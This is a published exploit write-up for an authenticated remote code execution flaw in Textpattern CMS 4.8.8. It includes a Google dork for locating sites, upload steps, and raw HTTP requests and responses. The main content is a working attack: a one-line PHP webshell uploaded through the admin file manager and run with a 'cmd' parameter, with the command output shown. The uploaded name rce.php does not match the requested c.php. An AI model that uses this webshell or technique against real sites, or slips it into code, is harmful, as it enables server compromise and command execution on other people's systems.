Textpattern 4.8.8 Remote Code Execution

`# Exploit Title: Textpattern 4.8.8 - Remote Code Execution (RCE) (Authenticated)  
# Exploit Author: Alperen Ergel  
# Contact: @alpernae (IG/TW)  
# Software Homepage: https://textpattern.com/  
# Version : 4.8.8  
# Tested on: windows 11 xammp | Kali linux  
# Category: WebApp  
# Google Dork: intext:"Published with Textpattern CMS"  
# Date: 10/09/2022  
#  
######## Description ########  
#  
# Step 1: Login admin account and go settings of site  
# Step 2: Upload a file to web site and selecet the rce.php  
# Step3 : Upload your webshell that's it...  
#  
######## Proof of Concept ########  
  
  
========>>> START REQUEST <<<=========  
  
  
  
  
############# POST REQUEST (FILE UPLOAD) ############################## (1)  
  
POST /textpattern/index.php?event=file HTTP/1.1  
Host: localhost  
Content-Length: 1038  
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"  
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMgUEFltFdqBVvdJu  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36  
sec-ch-ua-platform: "Windows"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/textpattern/index.php?event=file  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: txp_login=admin%2C94d754006b895d61d9ce16cf55165bbf; txp_login_public=4353608be0admin  
Connection: close  
  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="fileInputOrder"  
  
1/1  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="app_mode"  
  
async  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
2000000  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="event"  
  
file  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="step"  
  
file_insert  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="id"  
  
  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="_txp_token"  
  
16ea3b64ca6379aee9599586dae73a5d  
------WebKitFormBoundaryMgUEFltFdqBVvdJu  
Content-Disposition: form-data; name="thefile[]"; filename="rce.php"  
Content-Type: application/octet-stream  
  
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>  
------WebKitFormBoundaryMgUEFltFdqBVvdJu--  
  
  
############ POST RESPONSE (FILE UPLOAD) ######### (1)  
  
HTTP/1.1 200 OK  
Date: Sat, 10 Sep 2022 15:28:57 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6  
X-Powered-By: PHP/8.1.6  
X-Textpattern-Runtime: 35.38 ms  
X-Textpattern-Querytime: 9.55 ms  
X-Textpattern-Queries: 16  
X-Textpattern-Memory: 2893 kB  
Content-Length: 270  
Connection: close  
Content-Type: text/javascript; charset=utf-8  
  
___________________________________________________________________________________________________________________________________________________  
  
############ REQUEST TO THE PAYLOAD ############################### (2)  
  
GET /files/c.php?cmd=whoami HTTP/1.1  
Host: localhost  
sec-ch-ua: "Chromium";v="105", "Not)A;Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: none  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Cookie: txp_login_public=4353608be0admin  
Connection: close  
  
  
############ RESPONSE THE PAYLOAD ############################### (2)  
  
HTTP/1.1 200 OK  
Date: Sat, 10 Sep 2022 15:33:06 GMT  
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6  
X-Powered-By: PHP/8.1.6  
Content-Length: 29  
Connection: close  
Content-Type: text/html; charset=UTF-8  
  
<pre>alpernae\alperen  
</pre>  
  
========>>> END REQUEST <<<=========  
  
`